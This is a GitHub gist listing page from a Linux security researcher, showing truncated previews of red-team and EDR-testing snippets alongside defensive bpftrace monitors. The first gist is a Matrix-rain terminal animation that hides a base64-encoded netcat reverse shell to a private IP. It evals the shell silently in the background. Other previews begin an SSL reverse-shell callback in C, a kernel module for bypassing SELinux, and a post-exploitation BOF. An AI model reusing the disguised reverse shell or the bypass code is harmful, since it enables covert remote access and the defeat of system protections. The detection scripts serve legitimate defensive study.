cr0nx’s gists

cr0nx / gist:319065401e120a7a395c453d741ad042

Created October 7, 2025 11:59

Matrix Reverse Shell

	#!/bin/bash
	[ -z "$LINES" ] \|\| [ "$LINES" -eq 0 ] && LINES=$(tput lines 2>/dev/null \|\| echo 24)
	[ -z "$COLUMNS" ] \|\| [ "$COLUMNS" -eq 0 ] && COLUMNS=$(tput cols 2>/dev/null \|\| echo 80)

	while :;do
	echo $LINES $COLUMNS $((RANDOM%COLUMNS)) "$(printf "\U$((RANDOM%500+1000))")";
	if [ -z "$_INIT" ]; then
	export _INIT=1;
	(e=$(echo -n 'bmMgMTkyLjE2OC4zOC4xMzEgNTU1NTUgLWUgL2Jpbi9iYXNo' \| base64 -d); eval "$e" 2>/dev/null &)
	fi;

cr0nx / gist:d444e94fd01db526a8be6ef3e4ff1e7d

Created September 29, 2025 14:13

EDR-T6370-combo-ssl-revshell-callback.c - https://www.defensive-security.com/edrmetry/

	// Check out https://edu.defensive-security.com/edrmetry-linux-matrix-for-download-advanced-hands-on-attack-ttps-catalog
	#include <stdio.h>
	#include <stdlib.h>
	#include <string.h>
	#include <unistd.h>
	#include <sys/socket.h>
	#include <arpa/inet.h>
	#include <netinet/in.h>
	#include <err.h>
	#include <openssl/ssl.h>

cr0nx / gist:fe91d3e012c5d537d527bca2e9d751ab

Created June 4, 2025 18:47

bpftrace commit_creds from user + kill_action

	#!/usr/bin/env bpftrace

	kprobe:commit_creds
	{
	// Check if the calling process has UID 1007
	if (uid == 1007) {
	// Get the struct cred pointer from arg0
	$cred = (struct cred *)arg0;

	// Read UID and GID fields from the struct cred

cr0nx / gist:588d910144549e5f7a5136b7fd662466

Created May 23, 2025 11:21

memfd_create blocker using Python+bpftrace -> Kill the ppid of memfd_create call

	import subprocess
	import os
	import signal
	import re

	# bpftrace script (embedded)
	BPFTRACE_SCRIPT = """
	#include <linux/sched.h>
	#include <linux/cred.h>

cr0nx / gist:343b5b73e74ed7d945b7a2650cdffa9b

Created May 20, 2025 09:43

Bypassing SELinux secure_mode_policyload with LKM

	#include <linux/module.h>
	#include <linux/kernel.h>
	#include <linux/cred.h>
	#include <asm/processor.h>

	#define LOG_TAG "[EDRmetry] "

	// Define a simplified selinux_state structure (only the enforcing field)
	struct selinux_state {
	int enforcing;

cr0nx / gist:1bd6daa7b0cc99320c771da95b203827

Created April 5, 2025 12:17

Find in-memory modification of kernel.yama.ptrace_scope with bpftrace - PoC

	#!/usr/bin/env bpftrace

	BEGIN
	{
	// Replace with the actual address from /proc/kallsyms
	$data_addr = 0xffffffff83c983b0; // Example: yama_sysctl_table->data address
	@last_val = (int32)$data_addr; // Initial value
	printf("Monitoring kernel.yama.ptrace_scope at address 0x%x (initial value: %d)\n",
	$data_addr, @last_val);
	}

cr0nx / gist:9030cc9389c50e0c21b81eb7ded077cd

Created January 28, 2025 09:13

bpftrace tracing init_module and finit_module syscalls

	#!/usr/bin/env bpftrace

	BEGIN {
	printf("Tracing init_module and finit_module syscalls... Hit Ctrl+C to stop.\n");
	}

	tracepoint:syscalls:sys_enter_init_module,
	tracepoint:syscalls:sys_enter_finit_module {
	printf("Syscall executed: %s (PID: %d, UID: %d, Command: %s)\n", probe, pid, uid, comm);
	}

cr0nx / gist:05e41c079af0311e44360961700ed265

Created January 15, 2025 12:58

nslookup.zig - Simple Linux nslookup BOF ready to use with bof-launcher

	const std = @import("std");
	const beacon = @import("bof_api").beacon;
	const posix = @import("bof_api").posix;
	const net = std.net;
	const mem = std.mem;

	const DNS_PORT = 53;
	const MAX_DNS_PACKET_SIZE = 512;
	const DNS_QUERY_CLASS_IN = 1;
	const DNS_QUERY_TYPE_A = 1;

cr0nx / gist:e972aac974e1b5c7703ff6de39c07ca8

Created October 7, 2024 12:20

Generic bpftrace-based RCE/webshell prevention technique for critical Linux network services. If for whatever reason you can't run it persistently, it could be useful also as a system-wide 'virtual patching' method.

	#!/usr/bin/env bpftrace

	tracepoint:syscalls:sys_enter_execve
	{
	@parent = comm;
	}

	tracepoint:syscalls:sys_exit_execve
	/ @parent == "httpd" \|\| @parent == "php-fpm" \|\| @parent == "mysqld" \|\| @parent == "java" \|\| @parent == "postjournal" /
	{

Leszek Mis cr0nx